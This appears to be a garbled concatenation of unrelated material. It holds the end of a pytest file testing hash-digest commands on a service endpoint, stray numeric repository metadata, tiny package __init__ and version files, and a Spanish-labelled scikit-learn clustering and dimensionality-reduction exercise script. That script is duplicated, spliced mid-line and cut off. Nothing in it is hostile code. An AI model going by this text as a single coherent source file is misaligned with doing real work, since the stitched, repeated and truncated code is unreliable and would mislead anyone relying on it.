cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha512_file(regtest, db, url, file):
data = {
"sha256_digest": file['sha256_digest'],
"scale": "hashes",
"command": "sha512_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_md5_mem(regtest, db, url, memory):
data = {
"sha256_digest": memory['sha256_digest'],
"scale": "hashes",
"command": "md5_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha1_mem(regtest, db, url, memory):
data = {
"sha256_digest": memory['sha256_digest'],
"scale": "hashes",
"command": "sha1_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha512_mem(regtest, db, url, memory):
data = {
"sha256_digest": memory['sha256_digest'],
"scale": "hashes",
"command": "sha512_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
# TODO: Test all
# TODO: Fuzzy should be removed
| 30.402062
| 55
| 0.597152
| 375
| 2,949
| 4.544
| 0.112
| 0.073944
| 0.147887
| 0.126761
| 0.923122
| 0.909038
| 0.909038
| 0.890845
| 0.890845
| 0.890845
| 0
| 0.02386
| 0.204137
| 2,949
| 96
| 56
| 30.71875
| 0.702173
| 0.01492
| 0
| 0.769231
| 0
| 0
| 0.262578
| 0
| 0
| 0
| 0
| 0.010417
| 0
| 1
| 0.089744
| false
| 0
| 0.025641
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d13d85363e00a6de80add3362faf5716d2678226
| 42
|
py
|
Python
|
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | 2
|
2017-12-28T02:34:41.000Z
|
2018-05-07T14:39:50.000Z
|
__version__ = '2.0.0'
VERSION = (2, 0, 0)
| 14
| 21
| 0.571429
| 8
| 42
| 2.5
| 0.375
| 0.8
| 0.9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 0.190476
| 42
| 2
| 22
| 21
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1524c9e39032d1d219384acc425892a5e04d30b
| 173
|
py
|
Python
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 3
|
2020-05-24T15:15:25.000Z
|
2021-10-05T21:19:50.000Z
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 2
|
2020-05-22T00:28:04.000Z
|
2020-05-23T01:18:48.000Z
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 1
|
2020-05-22T23:57:35.000Z
|
2020-05-22T23:57:35.000Z
|
from . import grafana_dashboard
from . import grafana_data_source
from . import grafana_folder
from . import grafana_notification_channel
from . import grafana_organization
| 28.833333
| 42
| 0.855491
| 22
| 173
| 6.409091
| 0.454545
| 0.35461
| 0.602837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115607
| 173
| 5
| 43
| 34.6
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d16ea216084b1d5fceca13f953b79b92f678f202
| 45,103
|
py
|
Python
|
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ==========# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ===================== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
